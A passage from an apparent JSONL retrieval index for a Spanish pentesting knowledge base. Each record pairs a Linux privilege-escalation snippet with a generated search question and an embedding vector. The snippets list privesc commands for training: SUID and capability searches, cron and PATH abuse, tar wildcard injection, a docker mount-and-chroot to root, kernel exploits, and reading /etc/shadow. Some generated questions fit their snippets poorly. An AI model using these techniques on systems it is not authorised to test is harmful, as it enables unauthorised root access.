-0.04451, 0.02472, 0.01256, -0.06801, 0.04047, -0.01456, 0.07717, -0.03194, 0.07375, 0.09575, -0.07301, 0.00557, -0.05432, 0.04676, 0.02779, -0.00742, 0.01965, -0.00835, -0.00788, -0.07087, -0.10057, 0.02634, -0.0002, -0.00217, -0.05286, -0.00109, -0.02144, -0.03538, -0.06051, -0.00663, 0.06757, -0.05658, 0.06541, -0.01456, -0.01631, -0.13122, 0.04742, -0.06105, -0.00875, 0.03383, -0.01973, 0.01266, -0.08484, 0.0145, 0.0315, -0.03957, 0.01803, 0.05533, -0.02747, -0.0219, -0.08671, -0.00203, -0.01117, 0.00692, -0.02315, -0.06214, 0.0123, -0.08786, 0.00741, -0.01755, -0.1016, -0.14336, 0.01149, -0.10291, 0.02624, -0.02505, -0.01919, -0.05965, -0.07949, 0.00778, -0.00256, 0.06721, 0.01779, -0.08863, 0.08486, -0.01306, -0.07732, -0.05127, 0.0053, -0.03264, -0.05239, -0.0101, -0.04452, -0.04076, -0.02992, -0.01152, -0.00533, 0.04101, 0.01674, 0.00689, 0.01699, -0.03902, 0.04163, -0.04331, 0.02122, -0.03294, -0.03768, 0.01141, -0.03024, -0.13955, 0.00351, 0.03436, 0.0145, -0.00289, 0.00875, 0.05402, 0.03526, 0.05253, 0.05899, -0.00037, 0.03165, -0.05745, 0.07465, 0.07367, -0.02505, 0.11062, -0.00707, -0.02751, -0.04475, 0.01102, -0.04205, -0.00616, 0.07684, 0.0519, -0.03305, 0.0245, -0.00092, 0.02843, 0.02403, 0.034, 0.03001, -1e-05, -0.07148, -0.01501, 0.09902, 0.04024, -0.01825, 0.01615, -0.02098, -0.02224, -0.0306, -0.03835, -0.05846, -0.02133, 0.08356, -0.04452, -0.0178, -0.06101, -0.00626, -0.08972, -0.03713, 0.01911, -0.04964, -0.04555, 0.03754, 0.00564, 0.0044, 0.04996, -0.01608]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Linux\n\n> Tras el foothold (Reverse shell + Estabilizar shell TTY): script automatizado (PEASS-ng) **+** revisiΓ³n manual. Paso 4 de la MetodologΓ­a OSCP.", "indexar": "que herramienta sirve para montar un reverse shell y estabilizar una conexiΓ³n TTY?", "v": [-0.05136, -0.04362, -0.33504, -0.14402, 0.01551, -0.05654, -0.20715, -0.03571, 0.10538, 0.08745, -0.15486, 0.02273, 0.11021, 0.02869, 0.10779, 0.13536, -0.04275, -0.19095, 0.0062, 0.01786, 0.00211, -0.05875, -0.04228, -0.11978, -0.01497, 0.07767, 0.00058, -0.08208, -0.242, -0.00932, 0.02576, -0.04873, 0.05873, -0.01878, -0.09853, -0.05649, 0.02793, 0.04018, -0.01912, 0.07324, -0.04307, -0.07762, 0.05986, 0.11597, 0.07605, 0.08705, 0.00925, -0.0536, 0.04313, 0.14588, -0.04757, -0.08122, -0.12887, 0.04101, -0.0277, -0.09446, 0.17299, -0.0938, 0.08741, -0.09979, -0.17909, 0.00471, -0.09663, 0.01804, 0.04305, 0.00428, -0.09044, -0.06227, -0.15134, 0.03592, -0.02563, -0.00656, 0.01111, -0.04004, -0.05507, 0.03521, 0.08943, 0.02677, 0.02004, 0.05692, -0.02251, -0.03995, -0.05705, 0.08267, -0.03079, -0.05757, 0.01619, -0.0837, 0.01777, 0.03569, 0.04128, 0.08971, -0.02093, 0.00145, -0.04204, -0.13766, -0.00057, -0.01819, -0.02679, -0.02074, 0.07177, -0.02186, 0.00836, 0.1143, -0.0085, -0.05019, 0.0057, 0.00308, -0.01683, 0.10713, 0.06547, 0.03068, 0.03499, 0.0596, -0.01116, -0.02224, -0.01452, -0.01769, -0.0074, -0.06326, 0.05699, 0.03978, -0.01275, -0.01016, -0.07695, 0.04159, 0.03654, 0.10132, -0.03768, -0.02388, -0.00725, 0.00544, -0.07986, -0.00716, -0.03223, 0.02001, 0.04791, -0.13395, -0.01425, -0.05424, 0.0185, 0.07804, -0.04619, -0.07258, 0.04737, 0.03573, 0.09534, -0.0388, -0.02033, 0.05211, 0.03741, 0.08369, -0.00719, -0.03384, -0.02664, -0.03956, -0.02748, 0.02014, -0.02054, 0.01775, -0.00383, -0.00137, 0.05692, -0.00195, 0.00326, -0.06833, -0.0492, 0.01893, 0.06565, -0.0119, 0.02295, 0.01772, 0.07209, 0.01798, 0.02904, -0.03113, -0.06772, 0.02246, -0.01449, -0.0474, 0.02966, -0.07647, -0.0026, -0.02997, 0.01964, 0.01877, 0.05194, 0.04303, -0.01147, 0.03835, -0.00153, 0.00533, -0.01982, -0.03542, 0.05665, -0.0201, 0.02227, -0.08453, 0.05455, 0.01736, -0.00873, -0.03414, 0.03865, -0.03718, 0.02282, 0.00157, -0.03044, 0.03548, 0.04087, 0.02851, 0.0037, 0.03341, 0.01519, 0.05988, 0.00707, -0.00342, 0.01011, 0.01209, -0.05403, 0.04419, -0.012, -0.02898, 0.02854, 0.04324, -0.0117, -0.00021, 0.00723, -0.00014, -0.0131, -0.02876, -0.00086, -0.0206, 0.00732, -0.00186, -0.05017, -0.0315, 0.01682, -0.03558, -0.00998, 0.00239, 0.0056, 0.05551, 0.01116, -0.05213, 0.00367, -0.04634, 0.01928, -0.0066, -0.00012, -0.03577, -0.04211, 0.02439, 0.02865, -0.0292, 0.00069, -0.02148]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Linux\n\n> Tras el foothold (Reverse shell + Estabilizar shell TTY): script automatizado (PEASS-ng) **+** revisiΓ³n manual. Paso 4 de la MetodologΓ­a OSCP.", "indexar": "cual es el mejor script automatizado para realizar un foothold en Linux?", "v": [-0.05451, 0.06732, -0.10128, -0.10308, -0.05567, -0.22598, -0.1896, 0.04192, -0.14701, 0.01228, -0.04658, -0.15825, 0.01169, -0.01646, 0.0737, -0.13091, -0.05354, -0.18652, -0.00968, -0.0246, -0.1148, 0.0795, -0.15, -0.07304, 0.05871, -0.04705, 0.10034, 0.0047, -0.08915, 0.04545, -0.02738, 0.10229, 0.01566, 0.0642, 0.00359, 0.01151, 0.09695, 0.08068, 0.07704, 0.17158, -0.00103, 0.02044, 0.03813, 0.03614, -0.05451, -0.15251, 0.09958, -0.04171, 0.09316, -0.15552, 0.11672, 0.02306, -0.03079, -0.05808, 0.03258, 0.06089, 0.15521, -0.12912, 0.02306, 0.00379, -0.08427, -0.04813, -0.04632, 0.01177, 0.01725, 0.06435, -0.00414, -0.08162, -0.02439, 0.01309, 0.09065, 0.09307, -0.13262, 0.01828, 0.03591, 0.11571, -0.10512, 0.05239, 0.01832, -0.02632, 0.04235, -0.03841, -0.0539, 0.04301, -0.06536, -0.17103, -0.03642, 0.01213, -0.05339, 0.07977, 0.10612, 0.02638, -0.04448, 0.03719, 0.05728, -0.00794, 0.10454, 0.05697, -0.04679, -0.02874, -0.045, -0.02307, -0.07256, 0.12253, -0.01104, -0.01543, 0.02309, 0.00956, -0.01714, -0.07144, 0.04695, 0.00793, -0.01821, 0.05299, -0.05959, -0.01155, -0.10389, 0.00055, -0.00417, -0.02779, -0.02727, 0.01539, -0.09207, -0.07522, -0.01797, -0.02552, 0.00791, 0.10745, -0.06498, -0.02126, 0.00217, -0.08443, -0.05619, -0.04759, -0.08476, 0.09714, 0.08707, -0.06282, -0.0609, 0.00084, 0.01544, 0.03941, 0.00814, 0.05304, 0.09934, -0.03923, -0.00237, -0.02424, 0.03572, -0.05917, -0.05874, 0.00663, 0.07616, -0.03379, -0.03543, -0.0408, 0.02621, 0.02756, -0.07334, 0.02616, -0.00695, -0.07499, 0.00305, -0.00717, -0.00444, -0.00985, 0.01944, 0.09911, -0.01817, -0.00502, 0.03487, 0.07723, 0.01647, -0.03885, 0.00817, -0.07797, 0.06844, -0.05851, -0.01239, 0.01638, 0.04866, 0.02582, 0.03345, 0.01426, 0.06935, 0.03248, -0.02389, 0.01686, 0.01331, 0.00191, 0.08864, 0.05026, -0.04011, -0.03477, -0.00456, 0.02876, -0.02446, -0.02684, -0.01073, 0.00784, -0.09019, 0.0215, -0.01268, -0.03552, -0.00363, -0.0014, -0.02193, -0.05423, -0.02038, -0.01977, 0.00639, 0.00036, 0.03964, -0.02356, 0.01837, -0.01135, -0.01345, 0.0334, 0.00281, -0.03444, 0.00688, -0.03578, 0.06814, -0.05259, -0.03778, -0.06417, 0.04879, 0.04564, -0.03818, -0.03969, -0.01329, -0.01507, 0.0103, 0.00772, -0.03795, 0.00518, 0.0392, -0.03435, -0.01457, -0.07231, -0.05797, 0.05596, -0.01186, -0.09087, -0.03221, -0.01266, -0.06779, 0.00239, -0.03546, -0.04814, -0.01932, -0.03652, 0.00522, 0.01594, 0.00125, 0.03776]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Linux\n\n> Tras el foothold (Reverse shell + Estabilizar shell TTY): script automatizado (PEASS-ng) **+** revisiΓ³n manual. Paso 4 de la MetodologΓ­a OSCP.", "indexar": "con que programa puedo revisar manualmente una conexiΓ³n establecida de forma segura?", "v": [0.15365, 0.22412, -0.26049, -0.0946, 0.16451, -0.09367, -0.05678, -0.15747, -0.19229, -0.14778, -0.01548, -0.02768, 0.03841, -0.06461, 0.06047, 0.05026, -0.0092, -0.02321, 0.02151, -0.00588, 0.05397, -0.12986, -0.0118, -0.00334, -0.00503, 0.02649, 0.07638, -0.032, -0.05014, -0.11215, 0.09681, 0.03881, 0.07237, 0.03242, -0.04231, 0.07773, -0.06521, 0.00646, 0.03462, 0.03936, -0.01505, -0.00185, 0.04425, 0.05398, 0.02437, 0.03968, 0.04968, -0.00246, -0.04722, -0.05543, -0.04097, 0.07121, -0.05229, -0.08815, -0.04954, -0.12108, 0.17715, -0.03431, -0.01723, 0.05575, -0.01467, -0.0185, 0.03907, 0.06384, 0.05643, 0.06801, 0.08585, -0.07059, -0.06992, 0.02623, 0.05883, -0.03093, -0.06193, 0.01766, 0.00308, -0.0236, 0.02503, -0.0287, 0.14186, -0.00308, -0.0781, -0.04472, 0.018, 0.09989, -0.08054, -0.07789, -0.05774, -0.07744, -0.04548, -0.07988, 0.02972, -0.09478, 0.03788, 0.08068, -0.01516, -0.05472, 0.05799, 0.01464, -0.02786, 0.00521, 0.07509, -0.02197, 0.01325, 0.14954, -0.01246, 0.00171, 0.053, 0.06151, 0.0211, 0.01152, -0.01416, 0.05291, -0.05841, -0.04881, -0.04886, 0.03824, -0.07684, -0.04406, 0.00696, -0.05074, -0.0918, -0.01883, -0.05577, -0.00167, 0.07869, -0.02771, -0.03981, 0.16492, -0.02714, 0.02552, 0.00492, 0.03225, -0.05064, -0.06423, -0.01602, -0.03414, -0.07046, -0.0303, 0.00509, -0.03549, 0.03403, 0.08305, 0.05867, -0.01109, 0.0822, -0.04642, -0.03853, -0.06653, -0.04587, 0.04242, -0.00287, 0.06216, 0.01118, 0.09913, -0.02872, 0.07596, 0.01255, -0.01848, -0.01551, 0.1265, 0.02683, 0.01501, 0.00594, -0.06191, 0.05583, -0.04046, -0.0151, -0.02197, 0.07385, -0.00126, -0.09029, 0.04085, -0.03621, -0.0413, -0.02727, -0.03675, -0.04473, -0.0583, 0.04787, -0.03639, -0.04926, 0.00554, 0.00822, -0.04849, -0.0366, -0.05954, 0.01115, 0.05624, 0.04475, 0.03571, 0.02558, 0.02097, -0.03915, 0.03312, -0.00902, -0.06057, -0.04793, 0.03951, -0.02618, 0.02026, -0.02204, -0.00232, 0.03966, -0.04027, 0.05963, 0.06684, -0.05699, 0.05342, 0.02931, 0.10314, 0.01091, -0.06879, 0.13057, -0.00848, 0.00434, -0.01587, -0.00547, -0.01551, 0.01045, 0.05669, -0.02906, -0.01404, 0.10325, -0.01578, 0.00287, -0.06943, 0.0569, 0.05138, 0.00297, 0.03634, -0.03536, -0.01287, -0.00529, -0.05619, 0.10877, 0.03705, 0.0199, -0.06357, -0.04805, -0.03915, 0.05205, 0.09922, -0.06, -0.07346, -0.01073, -0.02846, -0.09828, 0.03036, -0.00192, -0.01729, -0.03821, 0.06975, 0.08292, -0.03509, 0.01574, -0.04768]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. sudo -l β†’ SIEMPRE primero, sin password\n2. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null β†’ GTFOBins y LOLBAS\n3. Capabilities β†’ getcap -r / 2>/dev/null (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ /etc/crontab, /var/spool/cron (scripts que puedes editar)\n5. Wildcard injection β†’ tar czf /backup/* con --checkpoint\n6. PATH abuse β†’ script SUID llama \"ps\" sin ruta β†’ creas ./ps malicioso\n7. NFS no_root_squash β†’ showmount -e ; montas y subes un SUID\n8. Docker group β†’ docker run -v /:/mnt -it alpine chroot /mnt (= root)\n9. Kernel exploits β†’ ΓΊltimo recurso: DirtyCow, DirtyPipe (uname -a; searchsploit)\n10. Ficheros sensibles β†’ /etc/passwd escribible, /etc/shadow legible, /var/backups\n```", "indexar": "que herramienta sirve para listar todos los archivos con permisos SUID en el sistema?", "v": [0.08, -0.03689, -0.1716, -0.19037, 0.04363, -0.25387, -0.11914, -0.13321, -0.03011, -0.04531, -0.06819, -0.1074, 0.14283, -0.11667, 0.09205, -0.01651, 0.08794, -0.13852, -0.02378, 0.00016, 0.08534, 0.09806, -0.08334, -0.03505, -0.11821, -0.00674, 0.11425, -0.03072, -0.25663, 0.01491, -0.09434, 0.06419, 0.09716, -0.08689, -0.08241, -0.00162, 0.03926, 0.14276, -0.12695, 0.03319, 0.00465, 0.15586, -0.04431, 0.03901, -0.06255, -0.11036, -0.02778, 0.06645, 0.04372, 0.05197, -0.07075, -0.1208, -0.11896, -0.03785, 0.02415, -0.11953, 0.0767, -0.13961, -0.04374, -0.01132, -0.12893, 0.01986, 1e-05, -0.03174, -0.01533, 0.04248, 0.04406, -0.02486, -0.05954, 0.09825, -0.00927, 0.0251, 0.0968, -0.0134, -0.04294, 0.00284, 0.0145, 0.00719, 0.00206, -0.00136, 0.09128, -0.00832, -0.09417, -0.01844, -0.0095, -0.08375, 0.02293, -0.02335, -0.01868, -0.04257, 0.02695, 0.02262, 0.05499, 0.02266, 0.13003, -0.04485, 0.056, 0.02549, -0.06433, -0.06166, 0.07886, -0.03746, -0.04834, 0.08386, -0.06561, 0.03833, 0.03769, 0.01141, -0.02971, -0.02604, 0.04319, 0.01386, 0.04939, 0.08014, -0.04785, 0.08743, -0.05202, -0.08959, -0.06743, -0.06563, 0.03984, 0.07893, -0.00544, -0.05352, 0.06103, 0.011, -0.04185, 0.15014, -0.03766, -0.00312, 0.04506, 0.01291, -0.05286, 0.08028, -0.06647, -0.03244, 0.02313, -0.02873, -0.05908, 0.00454, 0.04693, 0.05429, 0.0276, -0.04073, 0.05698, -0.00025, 0.05907, -0.02638, -0.03087, -0.1096, -0.01443, -0.01968, -0.01665, -0.0171, -0.03343, 0.0618, -0.02942, -0.08856, -0.0513, 0.02548, -0.02458, -0.0135, -0.02679, 0.05816, 0.00971, -0.01707, 0.02326, 0.02483, 0.0346, 0.03706, 0.07164, 0.01289, 0.08513, -0.05906, 0.03312, -0.0104, -0.0028, -0.04511, 0.01659, -0.04965, -0.05677, -0.02326, -0.03942, 0.00393, 0.02762, -0.02531, 0.00056, -0.01152, -0.00098, 0.06697, -0.01051, 0.08873, 0.00193, -0.03379, -0.01855, 0.03838, -0.00812, -0.03554, 0.00489, -0.0207, -0.01703, 0.00331, -0.01844, -0.0242, 0.01213, 0.02999, 0.04324, 0.01321, 0.04116, 0.01069, 0.00505, -0.00756, 0.08177, -0.02476, -0.02028, 0.00089, -0.03876, 0.03246, 0.00203, -0.0695, 0.07363, 0.01799, 0.04475, 0.02007, 0.00409, 0.0229, 0.01516, -0.00436, 0.01122, -0.02452, 0.01026, -0.047, 0.0073, -0.00345, -0.00372, -0.05858, -0.00018, -0.00986, -0.03619, -0.01992, -0.00235, 0.04417, 0.04139, -0.02617, -0.04811, -0.04356, 0.02308, -0.05461, 0.01298, -0.10485, -0.0143, 0.06545, 0.02804, 0.00295, 0.065, -0.01117]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. sudo -l β†’ SIEMPRE primero, sin password\n2. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null β†’ GTFOBins y LOLBAS\n3. Capabilities β†’ getcap -r / 2>/dev/null (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ /etc/crontab, /var/spool/cron (scripts que puedes editar)\n5. Wildcard injection β†’ tar czf /backup/* con --checkpoint\n6. PATH abuse β†’ script SUID llama \"ps\" sin ruta β†’ creas ./ps malicioso\n7. NFS no_root_squash β†’ showmount -e ; montas y subes un SUID\n8. Docker group β†’ docker run -v /:/mnt -it alpine chroot /mnt (= root)\n9. Kernel exploits β†’ ΓΊltimo recurso: DirtyCow, DirtyPipe (uname -a; searchsploit)\n10. Ficheros sensibles β†’ /etc/passwd escribible, /etc/shadow legible, /var/backups\n```", "indexar": "cual es una alternativa libre a GTFOBins para buscar tΓ©cnicas de explotaciΓ³n?", "v": [-0.09063, -0.04946, -0.12661, -0.0161, -0.02074, -0.03726, 0.00647, 0.06301, -0.09449, 0.07211, -0.04066, -0.04004, 0.00547, 0.14379, 0.15643, -0.04107, 0.06396, -0.19384, 0.03092, 0.05887, -0.14491, 0.09693, 0.0481, -0.05426, -0.06107, -0.10406, -0.08674, -0.22091, -0.13046, -0.02736, 0.09406, -0.0316, -0.03511, -0.05843, -0.10688, 0.12287, 0.05544, 0.00106, 0.02326, -0.04951, -0.00802, -0.19441, -0.1658, 0.02814, 0.10467, -0.14524, -0.03592, 0.05551, -0.08541, 0.00526, -0.06623, 0.04062, 0.0053, -0.07634, 0.05331, -0.12163, 0.0927, -0.09868, -0.12976, 0.04921, 0.00969, -0.03561, -0.00847, -0.08117, 0.0526, -0.04973, 0.04661, 0.10353, -0.01599, 0.05259, 0.02402, 0.01133, -0.05784, 0.00026, -0.02741, 0.03184, -0.03682, 0.08103, 0.06155, -0.04057, -0.04537, -0.03393, -0.09853, 0.06388, -0.03802, -0.12307, 0.18414, -0.05232, -0.01882, -0.09422, 0.0606, -2e-05, -0.03721, 0.03282, -0.03017, -0.12269, 0.04916, 0.01743, 0.04081, 0.05401, 0.02132, 0.02387, -0.08144, -0.01854, 0.04537, -0.00718, 0.06293, -0.05749, -0.11536, -0.01589, -0.05046, 0.02824, -0.00637, -0.02153, 0.03134, -0.02487, -0.13174, -0.03425, -0.03506, 0.01851, -0.01436, 0.00916, -0.08445, -0.00968, 0.08349, 0.00398, 0.01421, 0.07286, -0.0153, 0.02734, 0.03178, -0.02404, -0.10379, -0.04129, -0.04471, -0.023, 0.09933, -0.03067, -0.01753, -0.084, 0.01727, 0.04278, -0.0046, -0.04894, 0.04638, -0.01431, 0.02492, -0.12857, 0.01564, -0.06245, 0.00465, -0.08959, -0.01664, 0.08143, -0.01092, -0.00483, -0.0463, -0.02305, -0.05184, 0.1002, 0.01784, -0.02027, -0.04977, 0.02382, -0.01383, 0.02758, -0.01243, -0.09236, -0.03112, -0.03899, -0.04681, -0.00985, 0.05398, -0.01394, 0.03491, -0.03728, 0.01499, -0.05542, 0.05562, -0.09682, 0.00991, 0.05048, -0.07754, -0.03619, -0.02857, -0.05359, 0.03164, -0.02157, 0.01529, -0.01311, 0.07017, 0.04197, -0.01186, -0.03141, -0.03104, -0.03468, -0.03148, 0.01285, -0.00343, -0.0277, -0.03128, -0.0115, -0.00431, -0.00529, -0.02675, -0.03201, -0.01931, 0.03048, -0.0856, 0.01445, 0.08035, -0.0896, 0.04917, -0.11219, -0.0512, 0.00072, 0.01164, -0.05077, 0.00261, 0.01393, 0.00801, 0.06489, 0.02679, 0.0022, -0.03093, -0.00956, 0.04995, 0.04331, -0.01764, 0.02822, -0.01788, 0.07798, -0.05521, -0.04306, 0.03115, 0.03378, 0.02985, 0.02291, -0.03494, 0.00699, 0.0393, 0.08451, -0.03142, 0.04676, -0.05425, -0.00629, -0.10079, 0.04445, 0.02572, -0.05109, -0.04536, 0.02144, 0.02791, -0.03267, 0.03278, -0.05622]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. sudo -l β†’ SIEMPRE primero, sin password\n2. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null β†’ GTFOBins y LOLBAS\n3. Capabilities β†’ getcap -r / 2>/dev/null (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ /etc/crontab, /var/spool/cron (scripts que puedes editar)\n5. Wildcard injection β†’ tar czf /backup/* con --checkpoint\n6. PATH abuse β†’ script SUID llama \"ps\" sin ruta β†’ creas ./ps malicioso\n7. NFS no_root_squash β†’ showmount -e ; montas y subes un SUID\n8. Docker group β†’ docker run -v /:/mnt -it alpine chroot /mnt (= root)\n9. Kernel exploits β†’ ΓΊltimo recurso: DirtyCow, DirtyPipe (uname -a; searchsploit)\n10. Ficheros sensibles β†’ /etc/passwd escribible, /etc/shadow legible, /var/backups\n```", "indexar": "que programa puedo usar para verificar si hay scripts cron editables en mi servidor?", "v": [0.05233, 0.07344, -0.23508, -0.17181, 0.02704, -0.17144, -0.02111, -0.05903, 0.05669, -0.10735, -0.12525, -0.07672, 0.00658, -0.18385, 0.02982, -0.00195, 0.13002, -0.17549, 0.10079, 0.10316, 0.04622, -0.04049, 0.03491, -0.02253, -0.12952, 0.07983, -0.01764, -0.00464, -0.08757, -0.06908, -0.02088, 0.04194, 0.09854, 0.00488, -0.02666, -0.03506, 0.05764, 0.08139, 0.03584, 0.14943, 0.07022, 0.00963, -0.05933, 0.04779, 0.02756, -0.03422, 0.11216, -0.03305, -0.03107, -0.04033, 0.00303, -0.02119, -0.14118, 0.06175, -0.05318, -0.00474, -0.02571, -0.20651, -0.04789, 0.06154, -0.05006, 0.0004, -0.02205, 0.00135, 0.04954, 0.04177, 0.0576, -0.04879, -0.09798, 0.02167, -0.07045, 0.07139, -0.03535, -0.05079, 0.03143, -0.00982, -0.02632, -0.08706, 0.08074, 0.04461, -0.04062, 0.04167, 0.05194, 0.1274, -0.14301, -0.07245, -0.05873, -0.0611, -0.05208, 0.02164, 0.09047, 0.07664, -0.01651, 0.05295, 0.03003, -0.02904, 0.11311, 0.00106, 0.06842, 0.04995, 0.0622, -0.06637, -0.00677, 0.11211, -0.06427, 0.09725, 0.12434, 0.00257, 0.01689, -0.0238, 0.0838, 0.01699, -0.12029, -0.01082, -0.04236, 0.00321, -0.01853, -0.03126, 0.05978, -0.02781, -0.0729, 0.04131, -0.07006, 0.02424, 0.05488, -0.03544, 0.08063, 0.01882, -0.07606, 0.07128, -0.07245, -0.01885, -0.07077, -0.06696, -0.08684, 0.05866, 0.06655, -0.03118, -0.03404, -0.04646, -0.0268, 0.07283, 0.01034, 0.06087, 0.12609, -0.03036, -0.03823, -0.06946, -0.07066, 0.00702, 0.07132, -0.06324, -0.02962, 0.02955, -0.08527, -0.1024, 0.05972, -0.0097, -0.06877, 0.00766, 0.00521, -0.02202, -0.00067, 0.0109, 0.07864, -0.04261, 0.04154, 0.06356, 0.06982, 0.08085, -0.01479, 0.06715, 0.05615, -0.07455, 0.04782, -0.04733, -0.0426, -0.05056, -0.0548, -0.00922, -0.03718, 0.02993, 0.03477, 0.01488, -0.05734, -0.06106, 0.00991, 0.03066, 0.0112, -0.00135, 0.01913, 0.0364, 0.01301, 0.01644, 0.04725, -0.00173, -0.0182, -0.01146, -0.01519, -0.06562, -0.05927, 0.05635, -0.0363, -0.03017, 0.08634, 0.02269, -0.03449, -0.0035, 0.02569, 0.04073, 0.00884, -0.02271, 0.04832, 0.01273, -0.03095, -0.01235, 0.04264, 0.01617, 0.03533, -0.06234, 0.03089, -0.01496, 0.04156, -0.02368, 0.0013, -0.0386, 0.03394, 0.02679, 0.03068, 0.03311, -0.01235, -0.00077, -0.06714, -0.02517, 0.03024, -0.06131, 0.00892, -0.04819, 0.00415, -0.11072, -0.0265, 0.07259, -0.00357, -0.05674, -0.03416, -0.00687, -0.04092, -0.03245, -0.03911, 0.00865, 0.01786, -0.0294, 0.05274, -0.07321, 7e-05, 0.02886]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Orden recomendado\n`sudo -l` β†’ SUID/caps + GTFOBins y LOLBAS β†’ cron β†’ resto. **Kernel exploit = ΓΊltimo recurso** (inestable) β†’ Exploits conocidos.", "indexar": "quΓ© herramienta me sirve para saber quΓ© permisos especiales tiene mi usuario", "v": [-0.04032, 0.14394, -0.14288, -0.11631, 0.01227, -0.13499, -0.16454, -0.14082, -0.06691, -0.1853, 0.00678, 0.0013, 0.06511, -0.10777, 0.07592, -0.02859, 0.14915, -0.03359, 0.06711, 0.0419, 0.08133, -0.03316, -0.11418, -0.04197, -0.16565, -0.058, 0.14033, -0.05038, -0.20933, 0.03025, 0.02004, 0.10336, 0.01853, -0.09885, -0.06462, 0.01317, 0.02154, 0.04897, -0.07272, 0.02392, 0.05283, 0.02674, -0.0714, 0.07627, 0.03961, -0.01518, -0.1244, 0.01054, -0.02175, 0.08145, -0.01475, -0.13001, -0.15672, -0.03395, 0.01422, -0.07273, 0.19122, -0.11375, 0.04032, -0.00223, -0.13036, -0.07056, -0.00975, 0.01611, 0.02607, -0.04604, 0.07803, -0.02415, -0.04423, 0.07746, -0.12206, 0.0288, 0.07768, -0.01354, 0.04615, -0.0099, -0.03522, 0.0253, 0.09022, -0.02603, 0.09897, 0.05312, -0.12414, -0.04497, -0.00281, -0.06799, 0.04581, -0.01233, 0.03986, -0.03046, 0.01282, 0.11521, -0.02764, -0.00193, 0.0249, -0.02487, 0.01876, 0.00203, -0.06875, 0.01659, 0.14492, -0.00982, -0.04265, 0.09798, -0.07692, -0.00648, 0.00578, -0.09754, -0.08443, 0.02498, 0.05505, 0.05064, -0.03381, 0.00237, -0.00939, 0.13945, -0.04528, -0.09168, -0.04798, -0.04158, 0.01363, 0.054, 0.00723, -0.01756, 0.03016, -0.0391, -0.04351, 0.14906, -0.0559, -0.07653, -0.04915, -0.05091, -0.01911, 0.01554, 0.01051, 0.01629, -0.00867, -0.07789, -0.12024, 0.00421, 0.00178, 0.00693, -0.03364, -0.02876, 0.01081, 0.03826, 0.03055, -0.03235, -0.02261, -0.07721, 0.03918, -0.11208, 0.01012, -0.00084, -0.03463, -0.01144, -0.05695, -0.06616, -0.0676, 0.0794, -0.00768, -0.02346, 0.00642, 8e-05, 0.04332, -0.04295, -0.02577, 0.00194, 0.06539, 0.08403, -0.00887, -0.00884, 0.04551, -0.08625, 0.04256, -0.07542, -0.05279, -0.01115, -0.02946, -0.07813, -0.04276, -0.00215, 0.00858, -0.01509, 0.01496, -0.05249, -0.00189, -0.02323, 0.03817, 0.0787, -0.03116, 0.08574, 0.05089, -0.10673, 0.02586, -0.00603, 0.01373, -0.07368, 0.00964, -0.04523, -0.01059, 0.00459, -0.0138, -0.02819, 0.05294, 0.00533, 0.003, -0.0149, 0.0397, 0.00487, 0.02285, -0.01253, 0.04932, -0.00636, -0.01485, 0.01258, 0.02807, 0.041, -0.00211, -0.03401, 0.07155, 0.00028, 0.03423, 0.02727, 0.02309, 0.04724, 0.04347, -0.05245, 0.00037, 0.05359, 0.03206, -0.0076, -0.02546, -0.03535, 0.00605, -0.07611, -0.00183, -0.00961, -0.02556, -0.02385, 0.00995, 0.06205, 0.02842, -0.03774, -0.0159, -0.03043, 0.00391, -0.00035, -0.08679, -0.06089, -0.01134, 0.01993, 0.04713, -0.03788, 0.02508, -0.0138]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Orden recomendado\n`sudo -l` β†’ SUID/caps + GTFOBins y LOLBAS β†’ cron β†’ resto. **Kernel exploit = ΓΊltimo recurso** (inestable) β†’ Exploits conocidos.", "indexar": "con quΓ© puedo comprobar si hay exploits vulnerables en mi sistema", "v": [0.09099, 0.16157, -0.2452, -0.0197, 0.04515, 0.0646, -0.01888, 0.02655, -0.05331, -0.20759, -0.01255, 0.05312, -0.01687, 0.07165, -0.00026, -0.05498, -0.00167, -0.07124, -0.00605, 0.0091, 0.03509, -0.04623, -0.05306, -0.06433, 0.00339, 0.12568, -0.02514, -0.03842, -0.0806, -0.03309, -0.11269, 0.08214, -0.01711, 0.00624, -0.02271, 0.09427, -0.07185, 0.03569, 0.1585, -0.03077, 0.1518, -0.05924, -0.01529, -0.04136, 0.12412, -0.09272, -0.16506, -0.09798, -0.0189, -0.03037, -0.06822, -0.04715, -0.18703, -0.10963, 0.01059, -0.07777, -0.02092, 0.02498, 0.03833, 0.00783, -0.06631, 0.0584, 0.07339, 0.00448, 0.09614, -0.06707, 0.06284, 0.02355, -0.10932, 0.12678, -0.016, -0.06189, 